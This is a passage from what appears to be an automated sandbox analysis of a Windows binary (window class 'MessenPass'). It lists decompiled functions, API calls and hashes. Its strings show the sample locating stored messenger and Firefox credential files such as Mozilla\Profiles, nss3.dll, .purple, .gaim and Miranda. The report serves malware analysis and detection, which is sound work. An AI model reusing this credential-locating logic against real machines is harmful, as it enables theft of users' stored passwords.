                                          • Opcode ID: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
                                          • Instruction ID: d47861f91907e87d10e443503ad883c0cefe0bd36095b640ea2ff485cde935f6
                                          • Opcode Fuzzy Hash: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
                                          • Instruction Fuzzy Hash: 53218C71204604AFD730DF18E881996B7F5EF04324B208A2EFC6A9B6D1C735FA59CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407944, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00407944(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t32;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t51 = __esi[1];
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t33 =  *_t53;
					_t23 = _t53[2] + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					0x413d5c( ~(0 | _t58 > 0x00000000) | _t24, _t32);
					 *_t53 = _t24;
					memset(_t24, 0, _t53[1] << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						0x413d56(_t33);
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}
















                                          0x00407944
                                          0x00407945
                                          0x00407948
                                          0x0040794c
                                          0x0040795f
                                          0x00407963
                                          0x00407965
                                          0x0040796b
                                          0x0040796c
                                          0x0040796f
                                          0x00407979
                                          0x00407988
                                          0x0040798a
                                          0x0040798f
                                          0x00407996
                                          0x004079a0
                                          0x004079a3
                                          0x004079a8
                                          0x004079af
                                          0x004079b8
                                          0x0040794e
                                          0x0040794e
                                          0x00407950
                                          0x00407952
                                          0x00407957
                                          0x00407958
                                          0x0040795b
                                          0x0040795d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040795d
                                          0x004079c8
                                          0x004079cb
                                          0x004079d4
                                          0x004079d4
                                          0x004079bd
                                          0x004079c1

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??2@??3@memcpymemset
                                          • String ID:
                                          • API String ID: 1865533344-0
                                          • Opcode ID: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
                                          • Instruction ID: be4f301e428eab7478e357bf13cd6827c7edeb2881237a21e1a336ab79825493
                                          • Opcode Fuzzy Hash: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
                                          • Instruction Fuzzy Hash: C8116DB1608601AFE329DF19D881A26F7E5FF88300F20892EE4DA87391D635E841CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E4B6, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040E4B6(intOrPtr _a4, char* _a8) {
				intOrPtr _v8;
				void _v275;
				char _v276;
				int _t17;
				void* _t21;

				_v8 = 1;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_t17 = strlen(_a8);
				_t6 = strlen(0x41894c) + 1; // 0x1
				if(_t17 + _t6 >= 0x104) {
					_v276 = 0;
				} else {
					E00406B4B( &_v276, _a8, 0x41894c);
				}
				_t21 = E004069D3( &_v276);
				_t38 = _t21;
				if(_t21 != 0) {
					_v8 = E0040E293(_t38, _a4,  &_v276);
				}
				return _v8;
			}








                                          0x0040e4d1
                                          0x0040e4d8
                                          0x0040e4df
                                          0x0040e4ea
                                          0x0040e4fd
                                          0x0040e504
                                          0x0040e519
                                          0x0040e506
                                          0x0040e510
                                          0x0040e516
                                          0x0040e527
                                          0x0040e52c
                                          0x0040e52f
                                          0x0040e540
                                          0x0040e540
                                          0x0040e54a

                                          APIs
                                          • memset.MSVCRT ref: 0040E4DF
                                          • strlen.MSVCRT ref: 0040E4EA
                                          • strlen.MSVCRT ref: 0040E4F8
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: prefs.js
                                          • API String ID: 581844971-3783873740
                                          • Opcode ID: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                          • Instruction ID: 18aa10c61fb3677f8c34c5df747d0d2d010b9cd1cf1f562783039ea2ec755a14
                                          • Opcode Fuzzy Hash: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
                                          • Instruction Fuzzy Hash: 9C01C87190011CBADB11EA95EC42BCABBAC9F0531DF1008BBE604E2181E7B49B948794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D4E9, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E0040D4E9(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x20a;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen("Mozilla\Profiles");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, "Mozilla\Profiles");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}








                                          0x0040d505
                                          0x0040d50c
                                          0x0040d50f
                                          0x0040d516
                                          0x0040d524
                                          0x0040d52e
                                          0x0040d541
                                          0x0040d54a
                                          0x0040d563
                                          0x0040d54c
                                          0x0040d55a
                                          0x0040d560
                                          0x0040d567
                                          0x0040d56f
                                          0x0040d571
                                          0x00000000
                                          0x0040d571
                                          0x0040d577

                                          APIs
                                          • memset.MSVCRT ref: 0040D516
                                          • strlen.MSVCRT ref: 0040D52E
                                          • strlen.MSVCRT ref: 0040D53C
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: Mozilla\Profiles
                                          • API String ID: 581844971-2796945589
                                          • Opcode ID: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                          • Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
                                          • Opcode Fuzzy Hash: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
                                          • Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D578, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E0040D578(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x61e;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen(".purple");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, ".purple");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}








                                          0x0040d594
                                          0x0040d59b
                                          0x0040d59e
                                          0x0040d5a5
                                          0x0040d5b3
                                          0x0040d5bd
                                          0x0040d5d0
                                          0x0040d5d9
                                          0x0040d5f2
                                          0x0040d5db
                                          0x0040d5e9
                                          0x0040d5ef
                                          0x0040d5f6
                                          0x0040d5fe
                                          0x0040d600
                                          0x00000000
                                          0x0040d600
                                          0x0040d606

                                          APIs
                                          • memset.MSVCRT ref: 0040D5A5
                                          • strlen.MSVCRT ref: 0040D5BD
                                          • strlen.MSVCRT ref: 0040D5CB
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: .purple
                                          • API String ID: 581844971-1504268026
                                          • Opcode ID: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
                                          • Instruction ID: 5dc147b8957afa7b06b9bacfad0a4e1db4396cb0d3e541dfcccdd27de6d8d665
                                          • Opcode Fuzzy Hash: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
                                          • Instruction Fuzzy Hash: 8C0120725081146AD711A669DC42BCA779C4F21709F2404BFF5C5F71C2FEB899C543AD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D607, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E0040D607(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x30f;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen(".gaim");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, ".gaim");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}








                                          0x0040d623
                                          0x0040d62a
                                          0x0040d62d
                                          0x0040d634
                                          0x0040d642
                                          0x0040d64c
                                          0x0040d65f
                                          0x0040d668
                                          0x0040d681
                                          0x0040d66a
                                          0x0040d678
                                          0x0040d67e
                                          0x0040d685
                                          0x0040d68d
                                          0x0040d68f
                                          0x00000000
                                          0x0040d68f
                                          0x0040d695

                                          APIs
                                          • memset.MSVCRT ref: 0040D634
                                          • strlen.MSVCRT ref: 0040D64C
                                          • strlen.MSVCRT ref: 0040D65A
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: .gaim
                                          • API String ID: 581844971-3490432478
                                          • Opcode ID: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
                                          • Instruction ID: a115bc8fa66553d394cd4cab83c679d7ef9605289ec37c5517f9616187ac7207
                                          • Opcode Fuzzy Hash: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
                                          • Instruction Fuzzy Hash: 540120729082546AD721A6699C42BCB779C4F21709F2008BFF5C8F31C2EEBC5AC543A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D696, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E0040D696(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x414;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen("Miranda");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, "Miranda");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}








                                          0x0040d6b2
                                          0x0040d6b9
                                          0x0040d6bc
                                          0x0040d6c3
                                          0x0040d6d1
                                          0x0040d6db
                                          0x0040d6ee
                                          0x0040d6f7
                                          0x0040d710
                                          0x0040d6f9
                                          0x0040d707
                                          0x0040d70d
                                          0x0040d714
                                          0x0040d71c
                                          0x0040d71e
                                          0x00000000
                                          0x0040d71e
                                          0x0040d724

                                          APIs
                                          • memset.MSVCRT ref: 0040D6C3
                                          • strlen.MSVCRT ref: 0040D6DB
                                          • strlen.MSVCRT ref: 0040D6E9
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: Miranda
                                          • API String ID: 581844971-4004425691
                                          • Opcode ID: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
                                          • Instruction ID: c142bb7588fded06bca0c3959130fc7bc280b220a29219a6f5312b9b0058b910
                                          • Opcode Fuzzy Hash: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
                                          • Instruction Fuzzy Hash: 180120769081146AD721BA699C42BDA779C4F21709F2404BBF5C4F31C2EEB859C543BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040623F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID:
                                          • API String ID: 714388716-0
                                          • Opcode ID: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                          • Instruction ID: dce8e19ef7dbf3e453dc58d21b67a2b53133f69bc0796553bf20bccd0e5dc17f
                                          • Opcode Fuzzy Hash: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
                                          • Instruction Fuzzy Hash: 310144769002089BCB22EBA5DC85EDB77BCAF88305F0004ABF54797141EF38A7C48B54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B15B, Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E0040B15B(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				long _t16;
				signed short _t24;
				signed short _t26;
				void* _t27;

				_t27 = __esi;
				_push(E00409445( *((intOrPtr*)(__esi + 0x390))));
				_t24 = 4;
				sprintf( &_v260, E0040876F(_t24));
				_t16 = E004099DC( *((intOrPtr*)(__esi + 0x390)), 0);
				if(_t16 > 0) {
					_t26 = 5;
					sprintf( &_v516, E0040876F(_t26));
					_t16 =  &_v260;
					0x413cf4(_t16,  &_v516, _t16);
				}
				if( *((intOrPtr*)(_t27 + 0x108)) != 0) {
					return SendMessageA( *(_t27 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}










                                          0x0040b15b
                                          0x0040b170
                                          0x0040b173
                                          0x0040b181
                                          0x0040b191
                                          0x0040b198
                                          0x0040b19d
                                          0x0040b1ab
                                          0x0040b1b7
                                          0x0040b1be
                                          0x0040b1c3
                                          0x0040b1ce
                                          0x00000000
                                          0x0040b1e4
                                          0x0040b1eb

                                          APIs
                                            • Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408838
                                            • Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877
                                          • sprintf.MSVCRT ref: 0040B181
                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B1E4
                                            • Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
                                            • Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808
                                          • sprintf.MSVCRT ref: 0040B1AB
                                          • _mbscat.MSVCRT ref: 0040B1BE
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                          • String ID:
                                          • API String ID: 203655857-0
                                          • Opcode ID: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                          • Instruction ID: ecab945e31bd422c391273073b57af520698e657e98585e8788b6dab187b6cf3
                                          • Opcode Fuzzy Hash: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
                                          • Instruction Fuzzy Hash: 0E0167B25003046AD721B775DC86FEB73AC6B04704F14046FB655B6182EA79EA848A68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405E4A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E00405E4A(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen(0x418198) + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E00406B4B( &_v268, _a4, 0x418198);
				}
				_t16 = E004069D3( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}







                                          0x00405e65
                                          0x00405e6c
                                          0x00405e74
                                          0x00405e86
                                          0x00405e8f
                                          0x00405ea4
                                          0x00405e91
                                          0x00405e9b
                                          0x00405ea1
                                          0x00405eb2
                                          0x00405ebb
                                          0x00405ec2

                                          APIs
                                          • memset.MSVCRT ref: 00405E6C
                                          • strlen.MSVCRT ref: 00405E74
                                          • strlen.MSVCRT ref: 00405E81
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$_mbscat_mbscpymemset
                                          • String ID: nss3.dll
                                          • API String ID: 581844971-2492180550
                                          • Opcode ID: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                          • Instruction ID: 0509c7bfbc4d162460136cac1117631891986418d94c1b22c83112455de3b5d3
                                          • Opcode Fuzzy Hash: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
                                          • Instruction Fuzzy Hash: 44F0CD7140C1186BDB10E769DC45FDA7BAC8F61719F1000B7F589E60C1DAB8ABC546A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040A6B4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0040A6B4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409DD6(_t26, _t15);
				_push(_t26);
				sprintf( &_v516, "</%s>");
				return E004067EC(_a4,  &_v516);
			}











                                          0x0040a6ce
                                          0x0040a6d0
                                          0x0040a6d7
                                          0x0040a6e6
                                          0x0040a6ed
                                          0x0040a6f9
                                          0x0040a6fd
                                          0x0040a703
                                          0x0040a70a
                                          0x0040a717
                                          0x0040a731

                                          APIs
                                          • memset.MSVCRT ref: 0040A6D7
                                          • memset.MSVCRT ref: 0040A6ED
                                            • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                            • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                          • sprintf.MSVCRT ref: 0040A717
                                            • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                            • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                          • String ID: </%s>
                                          • API String ID: 3699762281-259020660
                                          • Opcode ID: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                          • Instruction ID: 76c63a3487c2ea4e5ea40729799977580a4d7530bed5194a5a383ad1b54ece87
                                          • Opcode Fuzzy Hash: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
                                          • Instruction Fuzzy Hash: EB01F97290012977D720A719CC46FDE7B6CAF55705F0400FAB50DF3142EA749B848BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040783B, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040783B(void* __eax, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t10;
				int _t11;
				char* _t13;
				char* _t18;
				void* _t19;
				void* _t23;

				_t19 = __eax;
				E00407930(__eax);
				_t1 = _t23 + 0x14; // 0x4042e3
				_t2 = _t19 + 0x3cc; // 0x4cb
				_t18 = _t2;
				E00406958(0x143, _t18,  *_t1);
				 *((intOrPtr*)(_t23 + 0x1c)) = _t19 + 4;
				_t10 = strlen(_t18);
				_t11 = strlen(0x417f90);
				_t13 =  *((intOrPtr*)(_t23 + 0x20));
				if(_t11 + _t10 + 1 >= 0x143) {
					 *_t13 = 0;
					return _t13;
				}
				return E00406B4B(_t13, _t18, 0x417f90);
			}












                                          0x0040783f
                                          0x00407841
                                          0x00407846
                                          0x0040784a
                                          0x0040784a
                                          0x00407855
                                          0x0040785e
                                          0x00407862
                                          0x0040786f
                                          0x0040787d
                                          0x00407881
                                          0x0040788e
                                          0x00000000
                                          0x0040788e
                                          0x00000000

                                          APIs
                                            • Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          • strlen.MSVCRT ref: 00407862
                                          • strlen.MSVCRT ref: 0040786F
                                            • Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
                                            • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$CloseFind_mbscat_mbscpymemcpy
                                          • String ID: *.*$B@
                                          • API String ID: 470300861-2086290067
                                          • Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                          • Instruction ID: 1d68107b6d1fc83258085f2e46244374cde2cc5f318db11bb1f65da7a858b60d
                                          • Opcode Fuzzy Hash: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
                                          • Instruction Fuzzy Hash: C7F0E972D082166FD200AA66984599BBB9C8F52729F11443FF808B7142D63D6D0643AF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411F43, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47libraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,00411FF1), ref: 00411F53
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00411FB7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: ntdll.dll
                                          • API String ID: 2574300362-2227199552
                                          • Opcode ID: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                          • Instruction ID: c3f2c9e477f8672f67090740fae2e549de1e6c2fb6487af2d15ed3ca5984443d
                                          • Opcode Fuzzy Hash: cf6c50f50f44cecb4388a2af7e072cf3b9c31d8bc14ef792baaddb37fc731a17
                                          • Instruction Fuzzy Hash: DC110D20D0C6C9EDEB12C7ACC4087DEBEF55B16709F0880E8C585A6292C7BA5658C776
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040923A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040923A(void** __esi, struct HWND__* _a4) {
				long _v8;
				signed int _v20;
				signed int _v24;
				short _v28;
				void* _v36;
				void* _t17;
				long _t22;
				short* _t25;
				int _t27;
				void** _t28;

				_t28 = __esi;
				_t27 = 0;
				if(_a4 != 0) {
					_t17 = memset( *__esi, 0, __esi[1] << 2);
					if(__esi[1] > 0) {
						do {
							_v24 = _v24 & 0x00000000;
							_v20 = _v20 & 0x00000000;
							_t25 =  *_t28 + _t27 * 4;
							_v36 = 0x22;
							_t22 = SendMessageA(_a4, 0x1019, _t27,  &_v36);
							if(_t22 != 0) {
								 *_t25 = _v28;
								_t22 = _v8;
								 *(_t25 + 2) = _t22;
							}
							_t27 = _t27 + 1;
						} while (_t27 < _t28[1]);
						return _t22;
					}
				}
				return _t17;
			}













                                          0x0040923a
                                          0x00409241
                                          0x00409246
                                          0x00409252
                                          0x0040925d
                                          0x00409260
                                          0x00409262
                                          0x00409266
                                          0x0040926a
                                          0x0040927a
                                          0x00409281
                                          0x00409289
                                          0x0040928f
                                          0x00409292
                                          0x00409296
                                          0x00409296
                                          0x0040929a
                                          0x0040929b
                                          0x00000000
                                          0x004092a0
                                          0x0040925d
                                          0x004092a3

                                          APIs
                                          • memset.MSVCRT ref: 00409252
                                          • SendMessageA.USER32(?,00001019,00000000,?), ref: 00409281
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSendmemset
                                          • String ID: "
                                          • API String ID: 568519121-123907689
                                          • Opcode ID: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                          • Instruction ID: 143eebe103db385490b988b1a572ada648b34fe061aa254f91e3f3e50342256c
                                          • Opcode Fuzzy Hash: 462f7bc00b01c5c665d1b728afa31af522ee25155d9d26ee29ef20d9ca5f4486
                                          • Instruction Fuzzy Hash: 0A01A275800205FBDB218F95C845AAFB7B8FF84B59F00842DE854A6281E3349945CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040C3AF, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040C3AF(void* __esi) {
				struct _WNDCLASSA _v44;
				struct HWND__* _t21;

				_v44.hInstance =  *0x41dbd4;
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
				_v44.lpszClassName = __esi + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E00402CAC;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t21 = CreateWindowExA(0, 0x415454, 0x415454, 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x41dbd4, __esi);
				 *(__esi + 0x108) = _t21;
				return _t21;
			}





                                          0x0040c3ba
                                          0x0040c3c3
                                          0x0040c3cc
                                          0x0040c3d3
                                          0x0040c3d6
                                          0x0040c3dd
                                          0x0040c3e0
                                          0x0040c3e3
                                          0x0040c3e6
                                          0x0040c3ed
                                          0x0040c3f0
                                          0x0040c418
                                          0x0040c41e
                                          0x0040c426

                                          APIs
                                          • RegisterClassA.USER32(?), ref: 0040C3F0
                                          • CreateWindowExA.USER32(00000000,MessenPass,MessenPass,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000), ref: 0040C418
                                          Strings
                                          Memory Dump Source
